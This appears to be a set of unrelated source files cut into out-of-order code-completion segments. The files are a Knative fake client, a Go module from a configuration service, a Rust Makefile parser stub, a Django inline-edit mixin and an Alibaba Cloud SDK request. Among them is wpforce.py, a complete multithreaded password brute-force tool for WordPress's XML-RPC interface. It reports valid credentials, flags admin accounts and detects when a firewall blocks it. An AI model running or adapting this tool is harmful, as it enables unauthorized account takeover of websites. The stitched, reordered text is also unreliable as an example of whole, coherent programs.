distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// Code generated by client-gen. DO NOT EDIT.
package fake
import (
"context"
v1 "k8s.io/apimachinery/pkg/apis/meta/v1"
labels "k8s.io/apimachinery/pkg/labels"
schema "k8s.io/apimachinery/pkg/runtime/schema"
types "k8s.io/apimachinery/pkg/types"
watch "k8s.io/apimachinery/pkg/watch"
testing "k8s.io/client-go/testing"
v1alpha2 "knative.dev/eventing/pkg/apis/sources/v1alpha2"
)
// FakeApiServerSources implements ApiServerSourceInterface
type FakeApiServerSources struct {
Fake *FakeSourcesV1alpha2
ns string
}
var apiserversourcesResource = schema.GroupVersionResource{Group: "sources.knative.dev", Version: "v1alpha2", Resource: "apiserversources"}
var apiserversourcesKind = schema.GroupVersionKind{Group: "sources.knative.dev", Version: "v1alpha2", Kind: "ApiServerSource"}
// Get takes name of the apiServerSource, and returns the corresponding apiServerSource object, and an error if there is any.
func (c *FakeApiServerSources) Get(ctx context.Context, name string, options v1.GetOptions) (result *v1alpha2.ApiServerSource, err error) {
obj, err := c.Fake.
Invokes(testing.NewGetAction(apiserversourcesResource, c.ns, name), &v1alpha2.ApiServerSource{})
if obj == nil {
return nil, err
}
return obj.(*v1alpha2.ApiServerSource), err
}
// List takes label and field selectors, and returns the list of ApiServerSources that match those selectors.
func (c *FakeApiServerSources) List(ctx context.Context, opts v1.ListOptions) (result *v1alpha2.ApiServerSourceList, err error) {
obj, err := c.Fake.
Invokes(testing.NewListAction(apiserversourcesResource, apiserversourcesKind, c.ns, opts), &v1alpha2.ApiServerSourceList{})
if obj == nil {
return nil, err
}
label, _, _ := testing.ExtractFromListOptions(opts)
if label == nil {
label = labels.Everything()
}
list := &v1alpha2.ApiServerSourceList{ListMeta: obj.(*v1alpha2.ApiServerSourceList).ListMeta}
for _, item := range obj.(*v1alpha2.ApiServerSourceList).Items {
if label.Matches(labels.Set(item.Labels)) {
list.Items = append(list.Items, item)
}
}
return list, err
}
// Watch returns a watch.Interface that watches the requested apiServerSources.
func (c *FakeApiServerSources) Watch(ctx context.Context, opts v1.ListOptions) (watch.Interface, error) {
return c.Fake.
InvokesWatch(testing.NewWatchAction(apiserversourcesResource, c.ns, opts))
}
// Create takes the representation of a apiServerSource and creates it. Returns the server's representation of the apiServerSource, and an error, if there is any.
func (c *FakeApiServerSources) Create(ctx context.Context, apiServerSource *v1alpha2.ApiServerSource, opts v1.CreateOptions) (result *v1alpha2.ApiServerSource, err error) {
obj, err := c.Fake.
Invokes(testing.NewCreateAction(apiserversourcesResource, c.ns, apiServerSource), &v1alpha2.ApiServerSource{})
if obj == nil {
return nil, err
}
return obj.(*v1alpha2.ApiServerSource), err
}
// Update takes the representation of a apiServerSource and updates it. Returns the server's representation of the apiServerSource, and an error, if there is any.
func (c *FakeApiServerSources) Update(ctx context.Context, apiServerSource *v1alpha2.ApiServerSource, opts v1.UpdateOptions) (result *v1alpha2.ApiServerSource, err error) {
obj, err := c.Fake.
Invokes(testing.NewUpdateAction(apiserversourcesResource, c.ns, apiServerSource), &v1alpha2.ApiServerSource{})
if obj == nil {
return nil, err
}
return obj.(*v1alpha2.ApiServerSource), err
}
| func (c *FakeApiServerSources) UpdateStatus(ctx context.Context, apiServerSource *v1alpha2.ApiServerSource, opts v1.UpdateOptions) (*v1alpha2.ApiServerSource, error) {
obj, err := c.Fake.
Invokes(testing.NewUpdateSubresourceAction(apiserversourcesResource, "status", c.ns, apiServerSource), &v1alpha2.ApiServerSource{})
if obj == nil {
return nil, err
}
return obj.(*v1alpha2.ApiServerSource), err
}
// Delete takes name of the apiServerSource and deletes it. Returns an error if one occurs.
func (c *FakeApiServerSources) Delete(ctx context.Context, name string, opts v1.DeleteOptions) error {
_, err := c.Fake.
Invokes(testing.NewDeleteAction(apiserversourcesResource, c.ns, name), &v1alpha2.ApiServerSource{})
return err
}
// DeleteCollection deletes a collection of objects.
func (c *FakeApiServerSources) DeleteCollection(ctx context.Context, opts v1.DeleteOptions, listOpts v1.ListOptions) error {
action := testing.NewDeleteCollectionAction(apiserversourcesResource, c.ns, listOpts)
_, err := c.Fake.Invokes(action, &v1alpha2.ApiServerSourceList{})
return err
}
// Patch applies the patch and returns the patched apiServerSource.
func (c *FakeApiServerSources) Patch(ctx context.Context, name string, pt types.PatchType, data []byte, opts v1.PatchOptions, subresources ...string) (result *v1alpha2.ApiServerSource, err error) {
obj, err := c.Fake.
Invokes(testing.NewPatchSubresourceAction(apiserversourcesResource, c.ns, name, pt, data, subresources...), &v1alpha2.ApiServerSource{})
if obj == nil {
return nil, err
}
return obj.(*v1alpha2.ApiServerSource), err
} | // UpdateStatus was generated because the type contains a Status member.
// Add a +genclient:noStatus comment above the type to avoid generating UpdateStatus(). |
guidepost__fill.go | /*-
* Copyright (c) 2016-2017, Jörg Pernfuß
*
* Use of this source code is governed by a 2-clause BSD license
* that can be found in the LICENSE file.
*/
package soma
import (
"database/sql"
"fmt"
"strconv"
"github.com/mjolnir42/soma/internal/msg"
"github.com/mjolnir42/soma/internal/stmt"
"github.com/mjolnir42/soma/lib/proto"
"github.com/satori/go.uuid"
)
//
func (g *GuidePost) fillReqData(q *msg.Request) (bool, error) {
switch {
case q.Action == msg.ActionPropertyCreate && q.Property.Type == `service`:
return g.fillServiceAttributes(q)
case q.Section == msg.SectionNodeConfig && q.Action == msg.ActionAssign:
return g.fillNode(q)
case q.Section == msg.SectionCheckConfig && q.Action == msg.ActionDestroy:
return g.fillCheckDeleteInfo(q)
case q.Section == msg.SectionBucket && q.Action == msg.ActionCreate:
return g.fillBucketID(q)
case q.Section == msg.SectionGroup && q.Action == msg.ActionCreate:
return g.fillGroupID(q)
case q.Section == msg.SectionCluster && q.Action == msg.ActionCreate:
return g.fillClusterID(q)
case q.Action == msg.ActionPropertyDestroy:
return g.fillPropertyDeleteInfo(q)
case q.Section == msg.SectionCheckConfig && q.Action == msg.ActionCreate:
return g.fillCheckConfigID(q)
default:
return false, nil
}
}
// generate CheckConfigId
func (g *GuidePost) fillCheckConfigID(q *msg.Request) (bool, error) {
q.CheckConfig.ID = uuid.Must(uuid.NewV4()).String()
return false, nil
}
// generate BucketID
func (g *GuidePost) fillBucketID(q *msg.Request) (bool, error) {
q.Bucket.ID = uuid.Must(uuid.NewV4()).String()
return false, nil
}
// generate GroupID
func (g *GuidePost) fillGroupID(q *msg.Request) (bool, error) {
q.Group.ID = uuid.Must(uuid.NewV4()).String()
return false, nil
}
// generate ClusterID
func (g *GuidePost) fillClusterID(q *msg.Request) (bool, error) {
q.Cluster.ID = uuid.Must(uuid.NewV4()).String()
return false, nil
}
// Populate the node structure with data, overwriting the client
// submitted values.
func (g *GuidePost) fillNode(q *msg.Request) (bool, error) {
var (
err error
ndName, ndTeam, ndServer string
ndAsset int64
ndOnline, ndDeleted bool
)
if err = g.stmtNodeDetails.QueryRow(q.Node.ID).Scan(
&ndAsset,
&ndName,
&ndTeam,
&ndServer,
&ndOnline,
&ndDeleted,
); err != nil {
if err == sql.ErrNoRows {
return true, fmt.Errorf("Node not found: %s", q.Node.ID)
}
return false, err
}
q.Node.AssetID = uint64(ndAsset)
q.Node.Name = ndName
q.Node.TeamID = ndTeam
q.Node.ServerID = ndServer
q.Node.IsOnline = ndOnline
q.Node.IsDeleted = ndDeleted
return false, nil
}
// load authoritative copy of the service attributes from the
// database. Replaces whatever the client sent in.
func (g *GuidePost) fillServiceAttributes(q *msg.Request) (bool, error) {
var (
serviceID, attr, val, svName, svTeam, repoID string
rows *sql.Rows
err error
nf bool
)
attrs := []proto.ServiceAttribute{}
switch q.Section {
case msg.SectionRepositoryConfig:
// svName may be the ID or the name
serviceID = (*q.Repository.Properties)[0].Service.ID
svName = (*q.Repository.Properties)[0].Service.Name
svTeam = (*q.Repository.Properties)[0].Service.TeamID
case msg.SectionBucket:
serviceID = (*q.Bucket.Properties)[0].Service.ID
svName = (*q.Bucket.Properties)[0].Service.Name
svTeam = (*q.Bucket.Properties)[0].Service.TeamID
case msg.SectionGroup:
serviceID = (*q.Group.Properties)[0].Service.ID
svName = (*q.Group.Properties)[0].Service.Name
svTeam = (*q.Group.Properties)[0].Service.TeamID
case msg.SectionCluster:
serviceID = (*q.Cluster.Properties)[0].Service.ID
svName = (*q.Cluster.Properties)[0].Service.Name
svTeam = (*q.Cluster.Properties)[0].Service.TeamID
case msg.SectionNodeConfig:
serviceID = (*q.Node.Properties)[0].Service.ID
svName = (*q.Node.Properties)[0].Service.Name
svTeam = (*q.Node.Properties)[0].Service.TeamID
}
// ignore error since it would have been caught by GuidePost
repoID, _, _, _ = g.extractRouting(q)
// validate the tuple (repo, team, service) is valid.
// also resolve and disambiguate serviceID and serviceName
if err = g.stmtServiceLookup.QueryRow(
repoID, serviceID, svName, svTeam,
).Scan(
&serviceID,
&svName,
); err != nil {
if err == sql.ErrNoRows {
nf = true
err = fmt.Errorf("Requested service %s not available for team %s",
svName, svTeam)
}
goto abort
}
// load attributes
if rows, err = g.stmtServiceAttributes.Query(
repoID, serviceID, svTeam,
); err != nil {
goto abort
}
defer rows.Close()
attrloop:
for rows.Next() {
if err = rows.Scan(&attr, &val); err != nil {
break attrloop
}
attrs = append(attrs, proto.ServiceAttribute{
Name: attr,
Value: val,
})
}
abort:
if err != nil {
return nf, err
}
// not aborted: set the loaded attributes
switch q.Section {
case msg.SectionRepositoryConfig:
(*q.Repository.Properties)[0].Service.Attributes = attrs
case msg.SectionBucket:
(*q.Bucket.Properties)[0].Service.Attributes = attrs
case msg.SectionGroup:
(*q.Group.Properties)[0].Service.Attributes = attrs
case msg.SectionCluster:
(*q.Cluster.Properties)[0].Service.Attributes = attrs
case msg.SectionNodeConfig:
(*q.Node.Properties)[0].Service.Attributes = attrs
}
return false, nil
}
// if the request is a check deletion, populate required IDs
func (g *GuidePost) fillCheckDeleteInfo(q *msg.Request) (bool, error) {
var delObjID, delObjTyp, delSrcChkID string
var err error
if err = g.stmtCheckDetailsForDelete.QueryRow(
q.CheckConfig.ID,
q.CheckConfig.RepositoryID,
).Scan(
&delObjID,
&delObjTyp,
&delSrcChkID,
); err != nil {
if err == sql.ErrNoRows {
| return false, err
}
q.CheckConfig.ObjectID = delObjID
q.CheckConfig.ObjectType = delObjTyp
q.CheckConfig.ExternalID = delSrcChkID
return false, nil
}
// if the request is a property deletion, populate required IDs
func (g *GuidePost) fillPropertyDeleteInfo(q *msg.Request) (bool, error) {
var (
err error
row *sql.Row
queryStmt, view, sysProp, value, cstID, cstProp string
svcID, oncID, oncName string
oncNumber int
)
// select SQL statement
switch q.Section {
case msg.SectionRepositoryConfig:
switch q.Property.Type {
case msg.PropertySystem:
queryStmt = stmt.RepoSystemPropertyForDelete
case msg.PropertyCustom:
queryStmt = stmt.RepoCustomPropertyForDelete
case msg.PropertyService:
queryStmt = stmt.RepoServicePropertyForDelete
case msg.PropertyOncall:
queryStmt = stmt.RepoOncallPropertyForDelete
}
case msg.SectionBucket:
switch q.Property.Type {
case msg.PropertySystem:
queryStmt = stmt.BucketSystemPropertyForDelete
case msg.PropertyCustom:
queryStmt = stmt.BucketCustomPropertyForDelete
case msg.PropertyService:
queryStmt = stmt.BucketServicePropertyForDelete
case msg.PropertyOncall:
queryStmt = stmt.BucketOncallPropertyForDelete
}
case msg.SectionGroup:
switch q.Property.Type {
case msg.PropertySystem:
queryStmt = stmt.GroupSystemPropertyForDelete
case msg.PropertyCustom:
queryStmt = stmt.GroupCustomPropertyForDelete
case msg.PropertyService:
queryStmt = stmt.GroupServicePropertyForDelete
case msg.PropertyOncall:
queryStmt = stmt.GroupOncallPropertyForDelete
}
case msg.SectionCluster:
switch q.Property.Type {
case msg.PropertySystem:
queryStmt = stmt.ClusterSystemPropertyForDelete
case msg.PropertyCustom:
queryStmt = stmt.ClusterCustomPropertyForDelete
case msg.PropertyService:
queryStmt = stmt.ClusterServicePropertyForDelete
case msg.PropertyOncall:
queryStmt = stmt.ClusterOncallPropertyForDelete
}
case msg.SectionNodeConfig:
switch q.Property.Type {
case msg.PropertySystem:
queryStmt = stmt.NodeSystemPropertyForDelete
case msg.PropertyCustom:
queryStmt = stmt.NodeCustomPropertyForDelete
case msg.PropertyService:
queryStmt = stmt.NodeServicePropertyForDelete
case msg.PropertyOncall:
queryStmt = stmt.NodeOncallPropertyForDelete
}
}
// execute and scan
switch q.Section {
case msg.SectionRepository, msg.SectionRepositoryConfig:
row = g.conn.QueryRow(queryStmt,
(*q.Repository.Properties)[0].SourceInstanceID)
case msg.SectionBucket:
row = g.conn.QueryRow(queryStmt,
(*q.Bucket.Properties)[0].SourceInstanceID)
case msg.SectionGroup:
row = g.conn.QueryRow(queryStmt,
(*q.Group.Properties)[0].SourceInstanceID)
case msg.SectionCluster:
row = g.conn.QueryRow(queryStmt,
(*q.Cluster.Properties)[0].SourceInstanceID)
case msg.SectionNodeConfig:
row = g.conn.QueryRow(queryStmt,
(*q.Node.Properties)[0].SourceInstanceID)
}
switch q.Property.Type {
case msg.PropertySystem:
err = row.Scan(&view, &sysProp, &value)
case msg.PropertyCustom:
err = row.Scan(&view, &cstID, &value, &cstProp)
case msg.PropertyService:
err = row.Scan(&view, &svcID)
case msg.PropertyOncall:
err = row.Scan(&view, &oncID, &oncName, &oncNumber)
}
if err != nil {
if err == sql.ErrNoRows {
return true, fmt.Errorf(
"Failed to find source property for %s",
(*q.Repository.Properties)[0].SourceInstanceID)
}
return false, err
}
// assemble and set results: property specification
var (
pSys *proto.PropertySystem
pCst *proto.PropertyCustom
pSvc *proto.PropertyService
pOnc *proto.PropertyOncall
)
switch q.Property.Type {
case msg.PropertySystem:
pSys = &proto.PropertySystem{
Name: sysProp,
Value: value,
}
case msg.PropertyCustom:
pCst = &proto.PropertyCustom{
ID: cstID,
Name: cstProp,
Value: value,
}
case msg.PropertyService:
pSvc = &proto.PropertyService{
ID: svcID,
}
case msg.PropertyOncall:
num := strconv.Itoa(oncNumber)
pOnc = &proto.PropertyOncall{
ID: oncID,
Name: oncName,
Number: num,
}
}
// assemble and set results: view
switch q.Section {
case msg.SectionRepositoryConfig:
(*q.Repository.Properties)[0].View = view
case msg.SectionBucket:
(*q.Bucket.Properties)[0].View = view
case msg.SectionGroup:
(*q.Group.Properties)[0].View = view
case msg.SectionCluster:
(*q.Cluster.Properties)[0].View = view
case msg.SectionNodeConfig:
(*q.Node.Properties)[0].View = view
}
// final assembly step
switch q.Section {
case msg.SectionRepositoryConfig:
switch q.Property.Type {
case msg.PropertySystem:
(*q.Repository.Properties)[0].System = pSys
case msg.PropertyCustom:
(*q.Repository.Properties)[0].Custom = pCst
case msg.PropertyService:
(*q.Repository.Properties)[0].Service = pSvc
case msg.PropertyOncall:
(*q.Repository.Properties)[0].Oncall = pOnc
}
case msg.SectionBucket:
switch q.Property.Type {
case msg.PropertySystem:
(*q.Bucket.Properties)[0].System = pSys
case msg.PropertyCustom:
(*q.Bucket.Properties)[0].Custom = pCst
case msg.PropertyService:
(*q.Bucket.Properties)[0].Service = pSvc
case msg.PropertyOncall:
(*q.Bucket.Properties)[0].Oncall = pOnc
}
case msg.SectionGroup:
switch q.Property.Type {
case msg.PropertySystem:
(*q.Group.Properties)[0].System = pSys
case msg.PropertyCustom:
(*q.Group.Properties)[0].Custom = pCst
case msg.PropertyService:
(*q.Group.Properties)[0].Service = pSvc
case msg.PropertyOncall:
(*q.Group.Properties)[0].Oncall = pOnc
}
case msg.SectionCluster:
switch q.Property.Type {
case msg.PropertySystem:
(*q.Cluster.Properties)[0].System = pSys
case msg.PropertyCustom:
(*q.Cluster.Properties)[0].Custom = pCst
case msg.PropertyService:
(*q.Cluster.Properties)[0].Service = pSvc
case msg.PropertyOncall:
(*q.Cluster.Properties)[0].Oncall = pOnc
}
case msg.SectionNodeConfig:
switch q.Property.Type {
case msg.PropertySystem:
(*q.Node.Properties)[0].System = pSys
case msg.PropertyCustom:
(*q.Node.Properties)[0].Custom = pCst
case msg.PropertyService:
(*q.Node.Properties)[0].Service = pSvc
case msg.PropertyOncall:
(*q.Node.Properties)[0].Oncall = pOnc
}
}
return false, err
}
// vim: ts=4 sw=4 sts=4 noet fenc=utf-8 ffs=unix
| return true, fmt.Errorf(
"Failed to find source check for config %s",
q.CheckConfig.ID)
}
|
lib.rs | extern crate regex;
mod lint;
pub use lint::*;
mod parse;
pub use parse::*;
#[derive(Default, Debug)]
pub struct | {
rules: Vec<Rule>,
vars: Vec<Var>,
}
impl Makefile {
fn new() -> Makefile {
Makefile { ..Default::default() }
}
fn add_rule(&mut self, rule: Rule) {
self.rules.push(rule);
}
fn add_var(&mut self, var: Var) {
self.vars.push(var);
}
fn rule_line(&mut self, line: String) {
if let Some(mut last) = self.rules.pop() {
last.body.push(line);
self.rules.push(last);
}
}
}
#[derive(Debug, Default)]
pub struct Rule {
target: String,
dependencies: Vec<String>,
line: usize,
body: Vec<String>,
}
#[derive(Debug)]
pub enum Var {
Eq(String, String, usize),
ColonEq(String, String, usize),
DoubleColonEq(String, String, usize),
PlusEq(String, String, usize),
QuestionEq(String, String, usize),
Special(String, String, usize)
}
#[cfg(test)]
mod tests {
#[test]
fn it_works() {}
}
| Makefile |
wpforce.py | import sys
import time
import socket
import urllib2
import argparse
import threading
__author__ = 'n00py'
# These variables must be shared by all threads dynamically
correct_pairs = {}
total = 0
def has_colours(stream):
if not hasattr(stream, "isatty"):
return False
if not stream.isatty():
return False # auto color only on TTYs
try:
import curses
curses.setupterm()
return curses.tigetnum("colors") > 2
except:
return False
has_colours = has_colours(sys.stdout)
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
def printout(text, colour=WHITE):
if has_colours:
seq = "\x1b[1;%dm" % (30+colour) + text + "\x1b[0m"
sys.stdout.write(seq)
else:
sys.stdout.write(text)
def slice_list(input, size):
input_size = len(input)
slice_size = input_size / size
remain = input_size % size
result = []
iterator = iter(input)
for i in range(size):
result.append([])
for j in range(slice_size):
result[i].append(iterator.next())
if remain:
result[i].append(iterator.next())
remain -= 1
return result
def worker(wordlist,thread_no,url,userlist,verbose,debug,agent):
global total
global correct_pairs
for n in wordlist:
current_pass = wordlist.index(n)
for x in userlist:
current_user = userlist.index(x)
user = userlist[current_user]
password = wordlist[current_pass]
if user not in correct_pairs:
if user != "":
if password != "":
PasswordAttempt(user,password,url,thread_no,verbose,debug,agent)
total += 1
def BuildThreads(list_array,url,debug,userlist,verbose,agent):
if debug:
print "Here is the content of the wordlists for each thread"
for i in range(len(list_array)):
print "Thread " + str(i)
printout(str(list_array[i]), YELLOW)
print "\n-----------------------------------------------------"
threads = []
for i in range(len(list_array)):
t = threading.Thread(target=worker, args=(list_array[i], i, url,userlist,verbose,debug,agent))
t.daemon = True
threads.append(t)
t.start()
def PrintBanner(input,wordlist,url,userlist,passlist):
banner = """\
,-~~-.___. __ __ ____ _____
/ | x \ \ \ / /| _ \ | ___|___ _ __ ___ ___
( ) 0 \ \ /\ / / | |_) || |_ / _ \ | '__|/ __|/ _ \.
\_/-, ,----' ____ \ V V / | __/ | _|| (_) || | | (__| __/
==== || \_ \_/\_/ |_| |_| \___/ |_| \___|\___|
/ \-'~; || | v.1.0.0
/ __/~| ...||__/|-" Brute Force Attack Tool for Wordpress
=( _____||________| ~n00py~
"""
print banner
print ("Username List: %s" % input) + " (" + str(len(userlist)) + ")"
print ("Password List: %s" % wordlist) + " (" + str(len(passlist)) + ")"
print ("URL: %s" % url)
def TestSite(url):
protocheck(url)
print "Trying: " + url
try:
urllib2.urlopen(url, timeout=3)
except urllib2.HTTPError, e:
if e.code == 405:
print url + " found!"
print "Now the brute force will begin! >:)"
if e.code == 404:
printout(str(e), YELLOW)
print " - XMLRPC has been moved, removed, or blocked"
sys.exit()
except urllib2.URLError, g:
printout("Could not identify XMLRPC. Please verify the domain.\n", YELLOW)
sys.exit()
except socket.timeout as e:
print type(e)
printout("The socket timed out, try it again.", YELLOW)
sys.exit()
def PasswordAttempt(user, password, url, thread_no,verbose,debug,agent):
if verbose is True or debug is True:
if debug is True:
thready = "[Thread " + str(thread_no) + "]"
printout(thready, YELLOW)
print "Trying " + user + " : " + password + "\n",
headers = {'User-Agent': agent,
'Connection': 'keep-alive',
'Accept': 'text/html'
}
post = "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>" + user + "</string></value></param><param><value><string>" + password + "</string></value></param></params></methodCall>"
try:
req = urllib2.Request(url, post, headers)
response = urllib2.urlopen(req, timeout=3)
the_page = response.read()
look_for = "isAdmin"
try:
splitter = the_page.split(look_for, 1)[1]
correct_pairs[user] = password
print "--------------------------"
success = "[" + user + " : " + password + "] are valid credentials! "
adminAlert = ""
if splitter[23] == "1":
adminAlert = "- THIS ACCOUNT IS ADMIN"
printout(success, GREEN)
printout(adminAlert, RED)
print "\n--------------------------"
except:
pass
except urllib2.URLError, e:
if e.code == 404 or e.code == 403:
global total
printout(str(e), YELLOW)
print " - WAF or security plugin likely in use"
total = len(passlist)
sys.exit()
else:
printout(str(e), YELLOW)
print " - Try reducing Thread count "
if args.verbose is True or args.debug is True:
print user + ":" + password + " was skipped"
except socket.timeout as e:
printout(str(e), YELLOW)
print " - Try reducing Thread count "
if args.verbose is True or args.debug is True:
print user + ":" + password + " was skipped"
except socket.error as e:
printout(str(e), YELLOW)
print " - Got an RST, Probably tripped the firewall\n",
total = len(passlist)
sys.exit()
def protocheck(url):
if "http" not in url:
printout("Please include the protocol in the URL\n", YELLOW)
sys.exit()
def main():
|
if __name__ == "__main__":
main()
| parser = argparse.ArgumentParser(description='This is a tool to brute force Worpress using the Wordpress API')
parser.add_argument('-i','--input', help='Input file name',required=True)
parser.add_argument('-w','--wordlist',help='Wordlist file name', required=True)
parser.add_argument('-u','--url',help='URL of target', required=True)
parser.add_argument('-v','--verbose',help=' Verbose output. Show the attemps as they happen.', required=False, action='store_true')
parser.add_argument('-t','--threads',help=' Determines the number of threads to be used, default is 10', type=int, default=10, required=False)
parser.add_argument('-a','--agent',help=' Determines the user-agent', type=str, default="WPForce Wordpress Attack Tool 1.0", required=False)
parser.add_argument('-d','--debug',help=' This option is used for determining issues with the script.', action='store_true', required=False)
args = parser.parse_args()
url = args.url
if url.endswith('/'):
url = url[:-1]
url += '/xmlrpc.php'
u = open(args.input, 'r')
userlist = u.read().split('\n')
totalusers = len(userlist)
f = open(args.wordlist, 'r')
passlist = f.read().split('\n')
PrintBanner(args.input,args.wordlist,args.url,userlist,passlist)
TestSite(url)
list_array = slice_list(passlist, args.threads)
BuildThreads(list_array,url,args.debug,userlist,args.verbose,args.agent)
while (len(correct_pairs) <= totalusers) and (len(passlist) > total):
time.sleep(0.1)
sys.stdout.flush()
percent = "%.0f%%" % (100 * (total)/len(passlist))
print " " + percent + " Percent Complete\r",
print "\nAll correct pairs:"
printout(str(correct_pairs), GREEN)
print "" |
xeditable.py | # -*- encoding: utf-8 -*-
import json
import re
import operator
import logging
from ..forms import XEditableUpdateForm
from .base import DatatableView
from django import get_version
from django.http import HttpResponse, HttpResponseBadRequest
from django.views.decorators.csrf import ensure_csrf_cookie
from django.db.models import ForeignKey
log = logging.getLogger(__name__)
CAN_UPDATE_FIELDS = get_version().split('.') >= ['1', '5']
class | (object):
xeditable_form_class = XEditableUpdateForm
xeditable_fieldname_param = 'xeditable_field' # GET parameter name used for choices ajax
def get(self, request, *args, **kwargs):
""" Introduces the ``ensure_csrf_cookie`` decorator and handles xeditable choices ajax. """
if request.GET.get(self.xeditable_fieldname_param):
return self.get_ajax_xeditable_choices(request, *args, **kwargs)
# Doing this in the method body at runtime instead of at declaration-time helps prevent
# collisions of other subclasses also trying to decorate their own get() methods.
method = super(XEditableMixin, self).get
method = ensure_csrf_cookie(method)
return method(request, *args, **kwargs)
def get_ajax_xeditable_choices(self, request, *args, **kwargs):
""" AJAX GET handler for xeditable queries asking for field choice lists. """
field_name = request.GET.get(self.xeditable_fieldname_param)
if not field_name:
return HttpResponseBadRequest("Field name must be given")
queryset = self.get_queryset()
if not self.model:
self.model = queryset.model
# Sanitize the requested field name by limiting valid names to the datatable_options columns
from datatableview.views import legacy
if isinstance(self, legacy.LegacyDatatableMixin):
columns = self._get_datatable_options()['columns']
for name in columns:
if isinstance(name, (list, tuple)):
name = name[1]
if name == field_name:
break
else:
return HttpResponseBadRequest("Invalid field name")
else:
if field_name not in self.get_datatable().config['columns']:
return HttpResponseBadRequest("Invalid field name")
field = self.model._meta.get_field_by_name(field_name)[0]
choices = self.get_field_choices(field, field_name)
return HttpResponse(json.dumps(choices))
def post(self, request, *args, **kwargs):
"""
Builds a dynamic form that targets only the field in question, and saves the modification.
"""
self.object_list = None
form = self.get_xeditable_form(self.get_xeditable_form_class())
if form.is_valid():
obj = self.get_update_object(form)
if obj is None:
data = json.dumps({
'status': 'error',
'message': "Object does not exist."
})
return HttpResponse(data, content_type="application/json", status=404)
return self.update_object(form, obj)
else:
data = json.dumps({
'status': 'error',
'message': "Invalid request",
'form_errors': form.errors,
})
return HttpResponse(data, content_type="application/json", status=400)
def get_xeditable_form_class(self):
""" Returns ``self.xeditable_form_class``. """
return self.xeditable_form_class
def get_xeditable_form_kwargs(self):
""" Returns a dict of keyword arguments to be sent to the xeditable form class. """
kwargs = {
'model': self.get_queryset().model,
}
if self.request.method in ('POST', 'PUT'):
kwargs.update({
'data': self.request.POST,
})
return kwargs
def get_xeditable_form(self, form_class):
""" Builds xeditable form computed from :py:meth:`.get_xeditable_form_class`. """
return form_class(**self.get_xeditable_form_kwargs())
def get_update_object(self, form):
"""
Retrieves the target object based on the update form's ``pk`` and the table's queryset.
"""
pk = form.cleaned_data['pk']
queryset = self.get_queryset()
try:
obj = queryset.get(pk=pk)
except queryset.model.DoesNotExist:
obj = None
return obj
def update_object(self, form, obj):
""" Saves the new value to the target object. """
field_name = form.cleaned_data['name']
value = form.cleaned_data['value']
setattr(obj, field_name, value)
save_kwargs = {}
if CAN_UPDATE_FIELDS:
save_kwargs['update_fields'] = [field_name]
obj.save(**save_kwargs)
data = json.dumps({
'status': 'success',
})
return HttpResponse(data, content_type="application/json")
def get_field_choices(self, field, field_name):
"""
Returns the valid choices for ``field``. The ``field_name`` argument is given for
convenience.
"""
if self.request.GET.get('select2'):
names = ['id', 'text']
else:
names = ['value', 'text']
choices_getter = getattr(self, 'get_field_%s_choices', None)
if choices_getter is None:
if isinstance(field, ForeignKey):
choices_getter = self._get_foreignkey_choices
else:
choices_getter = self._get_default_choices
return [dict(zip(names, choice)) for choice in choices_getter(field, field_name)]
def _get_foreignkey_choices(self, field, field_name):
formfield_kwargs = {}
if not field.blank:
# Explicitly remove empty choice, since formfield isn't working with instance data and
# will consequently try to assume initial=None, forcing the blank option to appear.
formfield_kwargs['empty_label'] = None
formfield = field.formfield(**formfield_kwargs)
return formfield.choices
def _get_default_choices(self, field, field_name):
return field.choices
class XEditableDatatableView(XEditableMixin, DatatableView):
pass
| XEditableMixin |
begin_contact_flow_version_modification.go | package cloudcallcenter
//Licensed under the Apache License, Version 2.0 (the "License");
//you may not use this file except in compliance with the License.
//You may obtain a copy of the License at
//
//http://www.apache.org/licenses/LICENSE-2.0
//
//Unless required by applicable law or agreed to in writing, software
//distributed under the License is distributed on an "AS IS" BASIS,
//WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
//See the License for the specific language governing permissions and
//limitations under the License.
//
// Code generated by Alibaba Cloud SDK Code Generator.
// Changes may cause incorrect behavior and will be lost if the code is regenerated.
import (
"github.com/aliyun/alibaba-cloud-sdk-go/sdk/requests"
"github.com/aliyun/alibaba-cloud-sdk-go/sdk/responses"
)
// BeginContactFlowVersionModification invokes the cloudcallcenter.BeginContactFlowVersionModification API synchronously
// api document: https://help.aliyun.com/api/cloudcallcenter/begincontactflowversionmodification.html
func (client *Client) BeginContactFlowVersionModification(request *BeginContactFlowVersionModificationRequest) (response *BeginContactFlowVersionModificationResponse, err error) {
response = CreateBeginContactFlowVersionModificationResponse()
err = client.DoAction(request, response)
return
}
// BeginContactFlowVersionModificationWithChan invokes the cloudcallcenter.BeginContactFlowVersionModification API asynchronously
// api document: https://help.aliyun.com/api/cloudcallcenter/begincontactflowversionmodification.html
// asynchronous document: https://help.aliyun.com/document_detail/66220.html
func (client *Client) BeginContactFlowVersionModificationWithChan(request *BeginContactFlowVersionModificationRequest) (<-chan *BeginContactFlowVersionModificationResponse, <-chan error) {
responseChan := make(chan *BeginContactFlowVersionModificationResponse, 1)
errChan := make(chan error, 1)
err := client.AddAsyncTask(func() {
defer close(responseChan)
defer close(errChan)
response, err := client.BeginContactFlowVersionModification(request)
if err != nil {
errChan <- err
} else {
responseChan <- response
}
})
if err != nil {
errChan <- err
close(responseChan)
close(errChan)
}
return responseChan, errChan
}
// BeginContactFlowVersionModificationWithCallback invokes the cloudcallcenter.BeginContactFlowVersionModification API asynchronously
// api document: https://help.aliyun.com/api/cloudcallcenter/begincontactflowversionmodification.html
// asynchronous document: https://help.aliyun.com/document_detail/66220.html
func (client *Client) BeginContactFlowVersionModificationWithCallback(request *BeginContactFlowVersionModificationRequest, callback func(response *BeginContactFlowVersionModificationResponse, err error)) <-chan int {
result := make(chan int, 1)
err := client.AddAsyncTask(func() {
var response *BeginContactFlowVersionModificationResponse
var err error
defer close(result)
response, err = client.BeginContactFlowVersionModification(request)
callback(response, err)
result <- 1
})
if err != nil {
defer close(result)
callback(nil, err)
result <- 0
}
return result
}
// BeginContactFlowVersionModificationRequest is the request struct for api BeginContactFlowVersionModification
type BeginContactFlowVersionModificationRequest struct {
*requests.RpcRequest
ContactFlowId string `position:"Body" name:"ContactFlowId"`
